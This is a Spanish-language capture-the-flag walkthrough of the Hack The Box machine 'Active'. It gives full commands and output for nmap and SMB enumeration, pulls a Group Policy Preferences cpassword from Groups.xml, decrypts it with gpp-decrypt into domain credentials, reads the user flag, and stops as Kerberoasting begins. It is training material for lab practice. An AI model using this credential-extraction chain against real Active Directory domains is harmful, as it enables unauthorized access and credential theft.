Active [EASY🟢]

Dificultad: Fácil

1- Reconocimiento y escaneo

`1.1 Ping`

PING 10.10.10.100 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=127 time=185 ms

--- 10.10.10.100 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 184.783/184.783/184.783/0.000 ms

Podemos notar que se trata de una maquina Windows, debido al TTL:

TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)

`1.2 Nmap`

❯ nmap -sS -sV -sC -p- -open --min-rate 5000 -Pn -vvv 10.10.10.100 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-23 19:26 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:26
Completed NSE at 19:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:26
Completed Parallel DNS resolution of 1 host. at 19:26, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:26
Scanning 10.10.10.100 [65535 ports]
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 5722/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 49168/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 49165/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 49166/tcp on 10.10.10.100
Discovered open port 47001/tcp on 10.10.10.100
Discovered open port 49166/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Discovered open port 9389/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Completed SYN Stealth Scan at 19:27, 15.72s elapsed (65535 total ports)
Initiating Service scan at 19:27
Scanning 23 services on 10.10.10.100
Service scan Timing: About 65.22% done; ETC: 19:28 (0:00:30 remaining)
Completed Service scan at 19:28, 61.62s elapsed (23 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 9.57s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 8.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.01s elapsed
Nmap scan report for 10.10.10.100
Host is up, received user-set (0.17s latency).
Scanned at 2025-02-23 19:26:57 -03 for 96s
Not shown: 65487 closed tcp ports (reset), 25 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49166/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-23T22:28:22
|_  start_date: 2025-02-22T11:34:26
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: 1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40109/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 36443/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 38631/udp): CLEAN (Timeout)
|   Check 4 (port 15484/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:28
Completed NSE at 19:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.51 seconds
           Raw packets sent: 76846 (3.381MB) | Rcvd: 71716 (2.869MB)

Esta maquina es un entorno de directorio activo, tambien vemos varios puertos interesantes:

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-23 22:27:22Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49166/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49168/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

La maquina esta corriendo sobre un Windows Server 2008 R2 SP1 y tiene activo el servidor de nombres de dominio(Puerto 53), en la que podemos encontrar debido al escaneo el domionio "active.htb".

Por lo que para que la IP correspondiente apunte al dominio, vamos a modificar el archivo "/etc/hosts" con Vim, de tal manera que quedaria:

Podemos tambien ver que tenemos el puerto 445(microsoft-ds?) correspondiente a un servidor SMB, y el puerto 47001 correspondiente a un servidor web(Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP))

`1.3 crackmapexec`

❯ crackmapexec smb 10.10.10.100
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)

`1.4 smbmap`

smbmap -H 10.10.10.100

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS

2- Explotación

`2.1 Explotación por SMB`

Si revisamos el escaneo de smbmap para listar los recursos compartidos del servicio de SMB, tenemos acceso al recurso "Replication" con permisos de lectura, vamos a ver que hay dentro del recurso compartido:

smbmap -H 10.10.10.100 -r Replication

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replication
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	active.htb
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Vemos que hay un directorio llamado "active.htb", listemos el directorio para ver que hay dentro:

smbmap -H 10.10.10.100 -r Replication/active.htb

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	DfsrPrivate
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Policies
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	scripts
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Vemos que hay 3 directorios, luego de una investigación, el unico directorio donde podemos encontrar información valiosa es "Policies", listemos para ver que hay dentro:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	{31B2F340-016D-11D2-945F-00C04FB984F9}
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	{6AC1786C-016F-11D2-945F-00C04fB984F9}
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Vemos 2 directorios, concretamente el que nos interesa es: "{31B2F340-016D-11D2-945F-00C04FB984F9}"

Veamos que hay dentro del directorio:

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	fr--r--r--               23 Sat Jul 21 07:38:11 2018	GPT.INI
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Group Policy
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	MACHINE
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	USER
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Vamos a listar el directorio "MACHINE":

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Microsoft
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Preferences
	fr--r--r--             2788 Sat Jul 21 07:38:11 2018	Registry.pol
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Ahora vamos a listar el directorio "Preferences":

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	Groups
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Y por ultimo, vamos a listar el directorio "Groups":

smbmap -H 10.10.10.100 -r Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	NO ACCESS	Logon server share 
	Replication                                       	READ ONLY	
	./Replicationactive.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	.
	dr--r--r--                0 Sat Jul 21 07:37:44 2018	..
	fr--r--r--              533 Sat Jul 21 07:38:11 2018	Groups.xml
	SYSVOL                                            	NO ACCESS	Logon server share 
	Users                                             	NO ACCESS	
[*] Closed 1 connections

Hay un archivo con extensión XML, vamos a bajarnos el archivo con el siguiente comando:

smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

Ejecutamos:

❯ smbmap -H 10.10.10.100 --download Replication/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml (533 bytes)
[+] File output to: /home/t0mz/CTF/active/10.10.10.100-Replication_active.htb_Policies_{31B2F340-016D-11D2-945F-00C04FB984F9}_MACHINE_Preferences_Groups_Groups.xml
[*] Closed 1 connections

El archivo se nos guardara con el nombre de la ruta de direcciones que seguimos dentro del recurso compartido, asi que vamos a renombrarlo:

❯ mv 10.10.10.100-Replication_active.htb_Policies_\{31B2F340-016D-11D2-945F-00C04FB984F9\}_MACHINE_Preferences_Groups_Groups.xml Groups.xml
❯ ls
 crackmapexec.txt   escaneo.txt   Groups.xml   ping.txt   smbmap.txt

Vamos a visualizar el contenido del archivo:

❯ cat Groups.xml
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: Groups.xml
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ <?xml version="1.0" encoding="utf-8"?>
   2   │ <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06"
       │  uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbC
       │ pZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
   3   │ </Groups>
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Hay unas posibles credenciales dentro de este archivo XML:

userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

La password esta encriptada con algún algoritmo de encriptado, vamos a desencriptarla

Para desencriptarla vamos a utilizar la herramienta de Kali llamda "gpp-decrypt" utilizando el siguiente comando:

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Ejecutamos:

❯ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

De tal manera que el usuario y la password quedarian de la siguiente manera:

userName="active.htb\SVC_TGS"
cpassword="GPPstillStandingStrong2k18"

Vamos a quitar el dominio "active.htb" dentro del userName:

userName="SVC_TGS"
cpassword="GPPstillStandingStrong2k18"

Perfecto, ya tenemos las credenciales, ahora con crackmapexec, vamos a ver si las credenciales son validas con crackmapexec con el siguiente comando:

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'

Ejecutamos:

❯ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

Ahora vamos a ver los permisos que tendremos en los recursos compartidos con las credenciales que obtuvimos con el siguiente comando:

crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares

Ejecutamos:

❯ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ

Podemos leer el recurso compartido de "Users", donde seguramente se encuentre la flag de usuario

`2.2 Obtención de la flag de usuario`

Vamos a listar los directorios del recurso compartido "Users" con smbmap y las credenciales que obtuvimos del archivo XML

Para eso, vamos a utilizar el siguiente comando:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users

Ejecutamos:

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
	./Users
	dw--w--w--                0 Sat Jul 21 11:39:20 2018	.
	dw--w--w--                0 Sat Jul 21 11:39:20 2018	..
	dr--r--r--                0 Mon Jul 16 07:14:21 2018	Administrator
	dr--r--r--                0 Mon Jul 16 18:08:56 2018	All Users
	dw--w--w--                0 Mon Jul 16 18:08:47 2018	Default
	dr--r--r--                0 Mon Jul 16 18:08:56 2018	Default User
	fr--r--r--              174 Mon Jul 16 18:01:17 2018	desktop.ini
	dw--w--w--                0 Mon Jul 16 18:08:47 2018	Public
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	SVC_TGS
[*] Closed 1 connections

Tendremos el directorio del usuario "SVC_TGS", vamos a listarlo:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users/SVC_TGS

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
	./UsersSVC_TGS
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	.
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	..
	dr--r--r--                0 Sat Jul 21 12:14:20 2018	Contacts
	dr--r--r--                0 Sat Jul 21 12:14:42 2018	Desktop
	dr--r--r--                0 Sat Jul 21 12:14:28 2018	Downloads
	dr--r--r--                0 Sat Jul 21 12:14:50 2018	Favorites
	dr--r--r--                0 Sat Jul 21 12:15:00 2018	Links
	dr--r--r--                0 Sat Jul 21 12:15:23 2018	My Documents
	dr--r--r--                0 Sat Jul 21 12:15:40 2018	My Music
	dr--r--r--                0 Sat Jul 21 12:15:50 2018	My Pictures
	dr--r--r--                0 Sat Jul 21 12:16:05 2018	My Videos
	dr--r--r--                0 Sat Jul 21 12:16:20 2018	Saved Games
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	Searches
[*] Closed 1 connections

Ahora vamos al escritorio:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users/SVC_TGS/Desktop

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
	./UsersSVC_TGS/Desktop
	dr--r--r--                0 Sat Jul 21 12:14:42 2018	.
	dr--r--r--                0 Sat Jul 21 12:14:42 2018	..
	fw--w--w--               34 Sat Feb 22 08:35:33 2025	user.txt
[*] Closed 1 connections

Ahi esta la flag, vamos a bajarnosla con el siguiente comando:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --download Users/SVC_TGS/Desktop/user.txt

Ejecutamos:

❯ smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --download Users/SVC_TGS/Desktop/user.txt

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)                                                         
[+] File output to: /home/t0mz/CTF/active/10.10.10.100-Users_SVC_TGS_Desktop_user.txt                                    
[*] Closed 1 connections

(Recordar cambiar el nombre de los archivos que nos bajamos de smbmap)

Ahora vamos a visualizar el contenido del archivo user.txt que contiene la flag para reclamarlo en Hack The Box

❯ mv 10.10.10.100-Users_SVC_TGS_Desktop_user.txt user.txt
❯ ls
 crackmapexec.txt   escaneo.txt   Groups.xml   password   ping.txt   smbmap.txt   user.txt
❯ cat user.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: user.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ 39ab1677a3ff895c301433570a1d57f7
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

3- Escalado de privilegios

`3.1 Kerberoasting`

Vamos a realizar un kerberoasting mediante tickets con el usuario SVC_TGS que logramos obtener, en resumen, le pedimos a la maquina con este usuario "SVC_TGS" un ticket, entonces el sistema nos lo va a dar en forma de hash, nosotros podemos utilizar John The Ripper o Hashcat para realizar fuerza bruta sobre ese hash, en mi caso utilizare John The Ripper

Para obtener el ticket en forma de hash, primero necesitamos tener sincronizada la hora de nuestro Kali, con la hora de la maquina objetivo, debido a problemas a la hora de la obtención del ticket en forma de hash, para eso tenemos una herramienta llamada "ntpdate", utilizaremos el siguiente comando:

